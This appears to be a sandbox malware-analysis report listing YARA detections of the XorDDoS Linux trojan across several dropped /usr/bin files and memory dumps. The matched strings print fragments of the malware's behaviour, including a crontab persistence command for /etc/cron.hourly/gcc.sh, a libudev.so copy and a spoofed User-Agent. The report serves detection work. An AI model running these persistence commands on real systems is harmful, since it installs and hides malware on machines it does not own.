/usr/bin/efgdvbpuxx	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ccxfvtbhgr	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/lkzqkklpfr	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ccxfvtbhgr	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ccxfvtbhgr	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ccxfvtbhgr	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ccxfvtbhgr	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ccxfvtbhgr	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/lkzqkklpfr	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/lkzqkklpfr	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/lkzqkklpfr	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/lkzqkklpfr	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/lkzqkklpfr	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ccxfvtbhgr	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/lkzqkklpfr	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/ccxfvtbhgr	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/lkzqkklpfr	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ezztyrfjzf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ezztyrfjzf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ezztyrfjzf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ezztyrfjzf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ezztyrfjzf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ezztyrfjzf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ezztyrfjzf	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/ezztyrfjzf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/dyuvutukki	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/dyuvutukki	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/dyuvutukki	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/dyuvutukki	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/dyuvutukki	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/dyuvutukki	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/dyuvutukki	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/dyuvutukki	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/vapcvdizxx	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/vapcvdizxx	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/vapcvdizxx	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/nxattrsdxm	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/vapcvdizxx	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/nxattrsdxm	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/bjhrrojebv	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/vapcvdizxx	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/bjhrrojebv	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/nxattrsdxm	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/nxattrsdxm	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/nxattrsdxm	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/nxattrsdxm	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/vapcvdizxx	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/bjhrrojebv	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/bjhrrojebv	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/bjhrrojebv	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/bjhrrojebv	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/vlteqhfomz	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/nxattrsdxm	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/vapcvdizxx	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/bjhrrojebv	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/vlteqhfomz	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/vlteqhfomz	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/vlteqhfomz	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/vlteqhfomz	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/vlteqhfomz	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/nxattrsdxm	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/vapcvdizxx	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/bjhrrojebv	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/vlteqhfomz	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/vlteqhfomz	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 106 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6475.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6444.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
